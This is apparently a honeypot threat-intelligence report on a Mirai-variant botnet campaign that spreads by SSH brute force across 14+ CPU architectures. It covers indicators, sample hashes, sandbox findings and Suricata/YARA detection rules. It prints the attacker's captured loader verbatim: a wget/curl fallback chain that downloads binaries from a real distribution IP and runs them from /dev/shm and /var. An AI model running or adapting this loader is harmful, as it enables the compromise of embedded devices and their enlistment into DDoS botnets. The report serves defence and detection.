Mirai variant with exceptional architecture breadth — 14+ binary variants targeting embedded Linux across SPARC, Renesas SH4, m68k, PowerPC, and more. SSH brute-force entry with a resilient multi-tool download chain.
Beginning 2026-05-21, cowrAI sensors began observing a sustained SSH brute-force campaign
distributing Mirai-family binaries from 192.142.28.77 via the path
/bachekuni/. The campaign remains active as of 2026-06-23 —
34 days and counting — and has touched all 36 fleet nodes across multiple geographic regions.
What distinguishes this campaign from typical Mirai drops is its exceptional architecture
coverage. The operator has compiled and maintains binaries for at least 14 CPU architectures,
including unusual targets — Renesas SH4, SPARC, Motorola m68k, PowerPC, and ARC — not commonly seen
in Mirai variant distribution. For each architecture, the loader attempts download via four
different tools in sequence (wget → busybox wget → curl → busybox curl),
with simultaneous execution from three filesystem locations to maximize persistence on embedded Linux
environments.
Behavioral analysis of the ARM7 sample confirms C2 communication to the domain
genddos.st — a DDoS-for-hire C2 indicator. Watchdog
modification (to prevent reboots from clearing the infection) and system binary writes were
observed in-sandbox. VirusTotal detects 37–41/62–64 engines across submitted samples, classified
as Mirai/FEBO and Mirai/GAFGYT lineages.
| Campaign Name | OHSHIT (operator-chosen binary naming) |
| Family | Mirai — FEBO / GAFGYT variant |
| Lineage | Mirai source-code derivative; triage YARA rules Mirai_SPARC / Mirai_ARM |
| Entry Vector | SSH brute-force (cowrie direct login) — confirmed by routers self-replication argument |
| Intent | DDoS botnet; C2 domain genddos.st is a DDoS-as-a-service indicator |
| Sophistication | Medium — standard Mirai toolkit compiled across 14 architectures; robust embedded-Linux installer shows real operational experience |
| First Seen | 2026-05-21 |
| Last Seen | 2026-06-23 (ACTIVE) |
| Distribution Host | 192.142.28.77 — Apache/2.4.58 (Ubuntu) |
| C2 Domain | genddos.st (behavioral IOC — ARM7 triage) |
| Operator Naming | /bachekuni/, ohshit.*, /cumshotnews, /routereater — deliberately crude, consistent style marker |
|
Scanner Fleet
4 known IPs
192.142.28.77 (primary)
176.65.139.64 172.166.156.97 176.65.139.168 |
→ |
Distribution Server
192.142.28.77
Apache/2.4.58 (Ubuntu)
/bachekuni/ohshit.<arch> 14+ binary variants |
→ |
C2 Server
genddos.st
DDoS-as-a-service C2
Observed in ARM7 behavioral analysis (tria.ge) |
|
↓ SSH brute-force → compromised embedded Linux targets → botnet enlistment → DDoS capability
|
||||
Notably, the distribution server (192.142.28.77) doubles as a scanner,
generating 1,598 of the 4,334 observed events directly. The open-directory probe confirmed
Apache/2.4.58 on Ubuntu and 2 items accessible at the directory root. The distribution server
also hosts secondary payloads at /cumshotnews (shell script, 7 VT
detections) and /routereater (shell script, 777 bytes).
The loader is a multi-stage shell sequence executed after SSH login, captured verbatim by cowrie. Each architecture follows the same four-phase pattern: download → chmod → execute → cleanup, with the execution step attempting three filesystem locations for persistence.
# Phase 1: Download — four-tool fallback chain, all errors suppressed
wget -q -O ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null || \
busybox wget -q -O ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null || \
curl -fsSL -o ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null || \
busybox curl -fsSL -o ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null
# Phase 2: Mark executable — tries both native and busybox chmod
chmod +x ohshit.mips 2>/dev/null; busybox chmod +x ohshit.mips 2>/dev/null
# Phase 3: Execute with multi-path persistence
# 3a. Direct execution from CWD
./ohshit.mips routers 2>/dev/null; \
# 3b. Copy to /dev/shm — RAM-backed, survives filesystem remount
cp ohshit.mips /dev/shm/ohshit.mips 2>/dev/null && \
chmod +x /dev/shm/ohshit.mips 2>/dev/null && \
/dev/shm/ohshit.mips routers 2>/dev/null; \
# 3c. Copy to /var — persistent storage fallback
cp ohshit.mips /var/ohshit.mips 2>/dev/null && \
chmod +x /var/ohshit.mips 2>/dev/null && \
/var/ohshit.mips routers 2>/dev/null; \
# 3d. Interpreter fallback — sh/busybox sh if exec bit failed
busybox sh ohshit.mips routers 2>/dev/null; \
sh ohshit.mips routers 2>/dev/null
# Phase 4: Cleanup — attempt to remove evidence from all locations
rm -f ohshit.mips /dev/shm/ohshit.mips /var/ohshit.mips 2>/dev/null
The routers argument is a Mirai self-replication mode indicator, confirming
the binary will attempt to propagate by SSH/Telnet scanning once running. The operator repeats this
entire sequence for each of the 14+ architectures in a single session, ensuring the binary that
matches the target's CPU will execute.
Many embedded Linux systems (routers, IP cameras, DVRs) ship with only busybox — no native wget or curl. Trying all four tools ensures download succeeds on factory-default firmware. This level of tool fallback is a strong indicator of embedded-Linux operational expertise.
Copying to /dev/shm/ (a RAM-backed tmpfs) gives two advantages: it bypasses noexec mounts on flash storage, and the binary runs from memory. Combined with the /var/ copy (persistent flash), the operator ensures at least one execution path survives most filesystem configurations.
14+ binary variants observed, including architectures rarely seen in Mirai variant distribution (SPARC, Renesas SH4, Motorola m68k, ARC, PowerPC). This is among the broadest architecture coverage documented in a single Mirai campaign.
| Architecture | Filename | Size | SHA256 (truncated) | VT | Triage |
|---|---|---|---|---|---|
| ARM (v4) | ohshit.arm | 138,072 | 9ae7aacc… | 41/63 Mirai | 10 Mirai |
| ARM5 | ohshit.arm5 | 99,796 | 6d87ae2e… | 37/63 Mirai | 10 Mirai |
| ARM6 | ohshit.arm6 | 145,700 | 8ab15f9d… | 39/63 Mirai | 10 Mirai |
| ARM7 ★ | ohshit.arm7 | 227,181 | 8d5eec24… | 38/63 Mirai | 10 Mirai |
| ARM64 | ohshit.arm64 | — | not captured | — | — |
| MIPS (big-endian) | ohshit.mips | 174,032 | f9ec1b33… | 32/? Mirai | 10 Mirai |
| MIPS (little-endian) | ohshit.mpsl | 177,440 | 9ad88e31… | 39/63 Mirai | 10 Mirai |
| x86 (i386) ×2 | ohshit.x86 | 124,180 / 132,596 | 3ad48bae… / c8545034… | 32/? Mirai | 10 Mirai |
| x86-64 | ohshit.x86_64 | 142,759 | 88d028a5… | 36/? Mirai | 10 Mirai |
| SPARC ⚑ | ohshit.spc | 138,280 | 69e3b714… | 37/62 Mirai | 10 Mirai_SPARC |
| Renesas SH4 ⚑ | ohshit.sh4 | 124,448 | e9b87420… | 41/64 Mirai | 10 Mirai |
| Motorola m68k ⚑ | ohshit.m68k | 144,036 | e9f77036… | 37/61 Mirai | 10 Mirai |
| PowerPC ⚑ | ohshit.ppc | 133,928 | ccb82d25… | 36/63 Mirai | 10 Mirai |
| ARC ⚑ | ohshit.arc | 165,312 | 4a75c5d3… | 29/? Mirai | 10 Mirai |
⚑ Unusual architecture rarely seen in Mirai campaigns. ★ ARM7 had successful behavioral sandbox run (genddos.st C2 observed).
ARM7 behavioral sandbox (tria.ge / Debian 12 ARM) observed outbound connections to
genddos.st — a DDoS-as-a-service command and control
domain. The distribution server 192.142.28.77 also appeared in
behavioral IOCs, suggesting it may serve dual purpose as C2 receiver.
DNS resolvers 8.8.8.8 and 1.1.1.1 were also contacted, consistent with Mirai's
resolver-bypass technique for C2 lookup.
| Popular Name | Mirai/FEBO, Mirai/GAFGYT |
| Category | Trojan |
| Top Engine | Gen:Variant.Linux.Mirai.7 |
| Detection Rate | 37–41 / 62–64 engines |
/bin folder/proc virtual filesystemrule Mirai_SPARC { /* fired on 69e3b714... (SPARC) */ }
rule Mirai_ARM { /* fired on 8d5eec24... (ARM7) */ }
The SPARC binary (ohshit.spc) could not be executed in any of the tria.ge sandbox environments
(amd64, armhf, mipsel, mips) — exec format error on all. This is expected: tria.ge has no
SPARC sandbox. Static analysis still fired the Mirai_SPARC YARA rule,
confirming Mirai code structure. This is a reminder that rare-arch malware is effectively
sandbox-immune in most analysis environments.
routers argument confirms Mirai self-replication mode (SSH/Telnet scanning).192.142.28.77/bachekuni/ via wget/curl fallback chain./dev/shm/ohshit.* — RAM-backed tmpfs evades noexec flash mounts and some file-integrity checks./dev/shm, and /var after execution — reduces on-disk forensic footprint./proc (confirmed in triage behavioral). Typical Mirai target-selection pre-scan behavior.genddos.st is a DDoS-as-a-service platform. Compromised devices enlisted into DDoS botnet.bachekuni loader. 976 events over 2 days./cumshotnews also captured./cumshotnews rev 2, /routereater) captured — confirms operator is actively maintaining and updating the distribution server.alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"cowrAI OHSHIT Botnet — Binary Download from bachekuni path"; flow:established,to_server; http.uri; content:"/bachekuni/ohshit."; startswith; classtype:trojan-activity; sid:9100110; rev:1; ) alert dns $HOME_NET any -> any 53 ( msg:"cowrAI OHSHIT Botnet — C2 Domain genddos.st"; dns.query; content:"genddos.st"; endswith; nocase; classtype:trojan-activity; sid:9100111; rev:1; ) alert ip any any -> 192.142.28.77 any ( msg:"cowrAI OHSHIT Botnet — Outbound to Distribution/C2 Host"; classtype:trojan-activity; sid:9100112; rev:1; )
alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"cowrAI OHSHIT Loader — Multi-arch download chain pattern"; flow:established,to_server; http.uri; pcre:"/\/bachekuni\/ohshit\.[a-z0-9_]+$/"; classtype:trojan-activity; sid:9100113; rev:1; )
rule OHSHIT_Botnet_Loader {
meta:
description = "OHSHIT botnet Mirai variant — multi-arch distribution"
author = "cowrAI honeypot fleet"
date = "2026-06-23"
tlp = "CLEAR"
strings:
$url1 = "192.142.28.77/bachekuni/" ascii
$path1 = "/dev/shm/ohshit" ascii
$path2 = "/var/ohshit" ascii
$arg1 = "routers" ascii
$c2 = "genddos.st" ascii
condition:
any of them
}
grep -E '(bachekuni|ohshit\.(arm|mips|arc|spc|sh4|m68k|ppc|x86)|genddos\.st)'
Data collected by the cowrAI distributed honeypot fleet — 36 cowrie 2.9.17 nodes across multiple hosting providers in Europe, North America, and Asia-Pacific, operating in SSH/Telnet capture mode with LLM-backend engagement and 9 alt-protocol lures.
Event collection: cowrie logs cowrie.command.input
events for all executed shell commands. Each session is indexed in a time-series event store.
This report covers 4,334 events matching bachekuni or
ohshit patterns, plus events from 192.142.28.77.
Sample collection: cowrAI's chase-runner extracts dropper URLs from captured commands, fetches binaries (with 64-URL cap per session), computes SHA256, and stores in R2. Each unique sample is automatically submitted to VirusTotal and tria.ge. The 14+ binary variants documented here were all captured via the chase pipeline from commands observed in sensor sessions.
Behavioral analysis: ARM7 sample (8d5eec24…) executed successfully in tria.ge's
Debian 12 ARM sandbox, producing the C2 connection to genddos.st and
behavioral signatures. SPARC, m68k, PowerPC, and SH4 samples could not be executed in any
available sandbox environment — exec format error (no matching sandbox arch). Static YARA
analysis still fired on all samples.